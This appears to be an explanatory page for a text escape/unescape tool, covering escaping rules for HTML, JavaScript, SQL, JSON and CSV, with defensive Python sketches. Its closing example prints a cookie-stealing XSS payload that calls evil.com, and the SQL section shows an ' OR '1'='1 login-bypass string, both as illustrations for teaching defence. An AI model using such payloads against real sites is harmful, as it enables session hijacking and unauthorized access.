Text Escape/Unescape

Escape and unescape text for various formats

Understanding Text Escaping
TL;DR

Text escaping converts special characters into safe sequences to prevent them from being interpreted as code. It's the first line of defense against injection attacks.

What is Text Escaping?

Text escaping is the process of replacing special characters with safe representations so they are treated as literal data rather than executable code or structural syntax. Every language and format has characters with special meaning — HTML uses < and > for tags, SQL uses ' for string delimiters, JSON uses " and \ for strings. When these characters appear in user-provided data, they must be escaped to prevent them from breaking the format or, worse, being interpreted as instructions.

Escaping is conceptually simple: you substitute each dangerous character with a harmless sequence that the consuming parser decodes back to the original character without triggering any special behavior. In HTML, < becomes &lt;. In JSON, a double quote inside a string becomes \". In SQL, a single quote becomes '' (doubled). The specific substitution rules depend entirely on the context.

The failure to properly escape text is one of the most exploited vulnerability classes in software history. Cross-Site Scripting (XSS), SQL injection, command injection, and CSV injection all stem from inserting untrusted data into a structured context without appropriate escaping.

Context-Specific Escaping

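There is no single “escape” function that works everywhere. Each output context has its own set of special characters and corresponding escape rules. Escaping for the wrong context often provides little or no protection: HTML-escaping a value, for example, does not make it safe inside a JavaScript string or a SQL query.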

HTML Escaping

HTML escaping converts characters that have meaning in HTML markup into their entity equivalents:

Character   HTML Entity   Reason
<           &lt;          Starts an HTML tag
>           &gt;          Ends an HTML tag
&           &amp;         Starts an HTML entity
"           &quot;        Delimits attribute values
'           &#x27;        Delimits attribute values (alternate)
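
As a minimal sketch of these substitutions, Python's standard `html.escape` covers all five characters when `quote=True`. Python is used here only for illustration, and the `escape_html` wrapper and the sample comment are hypothetical.

```python
import html

def escape_html(text: str) -> str:
    """Escape &, <, >, " and ' for insertion into HTML (hypothetical wrapper)."""
    # quote=True makes html.escape convert " to &quot; and ' to &#x27; as well
    return html.escape(text, quote=True)

comment = "<script>alert('hi')</script>"
escaped = escape_html(comment)
print(escaped)

# html.unescape reverses the substitution and recovers the original text
print(html.unescape(escaped) == comment)
```

The same pair of functions covers the unescape direction, which is useful when inspecting data that has already been escaped once.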

JavaScript String Escaping

When embedding data inside a JavaScript string (e.g., in a <script> block or an event handler), different rules apply:

Character   Escape       Reason
\           \\           Escape character itself
"           \"           String delimiter
'           \'           String delimiter
Newline     \n           Breaks string literal
</script>   <\/script>   Ends the script block prematurely
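
One way to apply these rules on the server is to reuse a JSON serializer and then break up the `</` sequence. The sketch below assumes the value is placed inside a `<script>` block (not an event-handler attribute, which would also need HTML escaping). The helper name `js_string_literal` is hypothetical, and this is not a complete defense (for example, `<!--` sequences are not handled).

```python
import json

def js_string_literal(value: str) -> str:
    """Return a double-quoted JavaScript string literal for value (hypothetical helper)."""
    # json.dumps escapes backslashes, double quotes, and control characters;
    # with the default ensure_ascii=True it also emits non-ASCII as \uXXXX
    literal = json.dumps(value)
    # Rewrite "</" as "<\/" so "</script>" cannot close the surrounding block
    return literal.replace("</", "<\\/")

user_bio = "Hi</script><script>alert(1)</script>"
snippet = "<script>var bio = " + js_string_literal(user_bio) + ";</script>"
print(snippet)
```

Single quotes are left alone because the generated literal is always delimited by double quotes.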

SQL Escaping

SQL injection remains one of the most dangerous vulnerabilities. While parameterized queries (prepared statements) are the correct solution, understanding SQL escaping helps explain why:

Character   Escape         Reason
'           '' (doubled)   String delimiter in SQL
\           \\             Escape character (MySQL)
%           \%             Wildcard in LIKE clauses
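
The sketch below combines both ideas using Python's built-in `sqlite3` module: a `?` placeholder carries the value, so quotes need no doubling, while LIKE wildcards are still escaped by hand because they are part of the pattern itself. The `escape_like` helper, the table, and the rows are hypothetical. The helper also escapes `_`, the single-character LIKE wildcard, which the table above does not list.

```python
import sqlite3

def escape_like(term: str, escape_char: str = "\\") -> str:
    """Escape LIKE wildcards so term matches literally (hypothetical helper)."""
    # Escape the escape character first, then the wildcards % and _
    return (term.replace(escape_char, escape_char * 2)
                .replace("%", escape_char + "%")
                .replace("_", escape_char + "_"))

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT)")
conn.executemany(
    "INSERT INTO products VALUES (?)",
    [("100% cotton",), ("100 percent wool",), ("O'Brien's tea",)],
)

# Search for the literal text "100%"; the outer % signs are real wildcards
pattern = "%" + escape_like("100%") + "%"
rows = conn.execute(
    "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\'", (pattern,)
).fetchall()
print(rows)
```

Without the escaping step, the pattern `%100%%` would also match "100 percent wool".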

JSON Escaping

When embedding strings in JSON, the following characters are escaped with a backslash. Escaping the forward slash is optional; the others are required:

Character   Escape   Reason
"           \"       String delimiter
\           \\       Escape character
/           \/       Optional, prevents </script> issues
Newline     \n       Control character
Tab         \t       Control character
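
To illustrate why these escapes matter, the following sketch compares naive string concatenation with Python's standard `json.dumps`. The sample name is hypothetical.

```python
import json

name = 'Ann "The Hammer" Lee\n'

# Naive concatenation leaves the quotes and the newline raw, so parsing fails
naive = '{"name": "' + name + '"}'
try:
    json.loads(naive)
    naive_is_valid = True
except json.JSONDecodeError:
    naive_is_valid = False

# A serializer applies the required escapes automatically
encoded = json.dumps({"name": name})

print(naive_is_valid)
print(encoded)
```

Parsing `encoded` with `json.loads` returns the original string unchanged, which is a quick way to check that nothing was lost in the round trip.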

Why Escaping Matters

Escaping is not about aesthetics or format compliance — it is a critical security boundary. When user-controlled data crosses from the data layer into a code layer (HTML, SQL, JavaScript, shell commands) without escaping, the user’s data can become executable instructions.

Cross-Site Scripting (XSS)

XSS is one of the most common web vulnerabilities. It occurs when a web application includes untrusted data in HTML output without escaping. An attacker injects JavaScript that executes in other users’ browsers, enabling cookie theft, session hijacking, defacement, and phishing.

There are three types:

  • Reflected XSS: The malicious script is part of the URL and reflected back in the page
  • Stored XSS: The script is permanently stored (e.g., in a database comment field) and served to every visitor
  • DOM-based XSS: The injection happens entirely in client-side JavaScript without server involvement

SQL Injection

SQL injection occurs when user input is concatenated into a SQL query without escaping or parameterization. An attacker can modify the query to bypass authentication, extract data, modify records, or even execute system commands.
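
The authentication bypass can be reproduced in a few lines. This is an illustrative sketch using Python's `sqlite3` with a hypothetical `users` table; the plaintext password is there only to keep the demo short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(name: str, password: str) -> bool:
    # VULNERABLE: user input is concatenated straight into the SQL text
    query = ("SELECT 1 FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_safe(name: str, password: str) -> bool:
    # Placeholders keep the input as data; it is never parsed as SQL
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None

payload = "' OR '1'='1"
print(login_unsafe("alice", payload))
print(login_safe("alice", payload))
```

With the payload, the unsafe query's WHERE clause ends in `OR '1'='1'`, which is always true, so the first call succeeds without the real password while the parameterized version rejects it.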

Command Injection

When user input is passed to shell commands (e.g., via exec() or backticks), characters like ;, |, and $() can chain additional commands. The solution is to use library functions that avoid the shell entirely, or to strictly validate and escape input.
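
A minimal sketch of the "avoid the shell" approach, assuming Python's `subprocess` module: arguments are passed as a list, so `;` and similar characters reach the program verbatim. The filename is a hypothetical malicious input, and the child process is simply the Python interpreter echoing its argument.

```python
import shlex
import subprocess
import sys

filename = "notes.txt; echo INJECTED"

# A list of arguments with no shell=True: nothing is interpreted by a shell
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", filename],
    capture_output=True,
    text=True,
    check=True,
)
received = result.stdout.strip()
print(received)

# If a POSIX shell cannot be avoided, shlex.quote wraps the value as one word
quoted = shlex.quote(filename)
print(quoted)
```

Note that `shlex.quote` targets POSIX shells only; it is not suitable for the Windows command interpreter.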

Common Use Cases

  • Rendering user content in HTML: Blog comments, forum posts, profile descriptions, and any other user-generated content must be HTML-escaped before insertion into a page to prevent XSS
  • Building SQL queries: Although parameterized queries are preferred, understanding escaping is essential for debugging, logging, and working with legacy systems that build SQL dynamically
  • Generating JSON responses: When constructing JSON strings manually (without a serializer), string values must be properly escaped to produce valid JSON and prevent injection
  • Embedding data in JavaScript: Server-rendered pages that inject data into <script> blocks must escape the data for the JavaScript context, not the HTML context
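  • CSV export: When generating CSV files from user data, fields containing commas, quotes, or newlines must be quoted (with embedded quotes doubled) to prevent parsing errors. Quoting alone does not stop formula injection: fields that begin with =, +, -, or @ also need to be neutralized, for example by prefixing a single quote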
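
For the CSV case, the sketch below uses Python's `csv` module for quoting and a separate, hypothetical `neutralize_formula` helper for formula injection. Prefixing a single quote is one commonly recommended mitigation, not the only one, and it will also alter legitimate values such as negative numbers.

```python
import csv
import io

FORMULA_PREFIXES = ("=", "+", "-", "@")

def neutralize_formula(field: str) -> str:
    """Prefix a single quote so spreadsheets treat the cell as text (hypothetical helper)."""
    return "'" + field if field.startswith(FORMULA_PREFIXES) else field

rows = [
    ["name", "note"],
    ['Ann "AJ" Lee', "likes commas, a lot"],
    ["Mallory", "=2+5"],
]

buffer = io.StringIO()
# csv.writer quotes fields containing commas, quotes, or newlines and doubles embedded quotes
writer = csv.writer(buffer, lineterminator="\n")
for row in rows:
    writer.writerow([neutralize_formula(cell) for cell in row])

print(buffer.getvalue())
```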

Try These Examples

Properly Escaped HTML (Valid)

The angle brackets < and > are escaped as &lt; and &gt;, and the single quotes are left as-is, which is safe in element content but not inside an attribute value. The browser renders the literal text <script>alert('hi')</script> instead of executing it as JavaScript.

&lt;script&gt;alert('hi')&lt;/script&gt;

Unescaped User Input (XSS Vulnerability) (Invalid)

Raw user input injected into HTML without escaping. A browser would execute this JavaScript, sending the user's cookies to an attacker. This is a classic Cross-Site Scripting (XSS) attack.

<script>document.location='https://evil.com/steal?c='+document.cookie</script>